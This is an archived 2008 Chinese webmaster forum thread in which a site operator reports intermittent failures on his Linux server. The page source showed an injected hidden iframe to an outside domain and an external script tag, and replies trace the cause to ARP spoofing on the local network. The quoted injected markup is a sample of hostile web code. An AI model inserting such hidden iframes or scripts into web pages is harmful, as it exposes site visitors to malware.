落伍者站长论坛's Archiver

soxy 发表于 2008-1-4 10:55

出现垃圾病毒感染

一台Linux服务器上, 个别站点打开网页地址有时候无法显示页面. 发现 原代码里出现:

<iframe   src="http://www.666888ip.cn/vip.html"   width="100"   height="0"> </iframe>
<div   style="display:none">
<script   language="javascript"   type="text/javascript"   src="http://js.users.51.la/1573451.js"> </script>

怀疑被挂木马, 请求支援!!

[[i] 本帖最后由 soxy 于 2008-1-4 11:08 编辑 [/i]]

soxy 发表于 2008-1-4 11:01

怀疑是apache被劫持,阵发性的,放不能访问站点的时候,查看页面原代码就会发现上面那个,而正常的时候原代码里确没有那段代码!

验证问答 发表于 2008-1-4 14:06

收费服务 QQ5703879

aya甜甜 发表于 2008-1-4 14:09

重装?

Bendy 发表于 2008-1-5 05:00

会不会是ARP....

soxy 发表于 2008-1-9 22:26

确实是同段机器受到ARP攻击所致

chenwb_2001 发表于 2008-1-19 23:31

明显的arp攻击,源代码没改动,修改了80端口通信

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.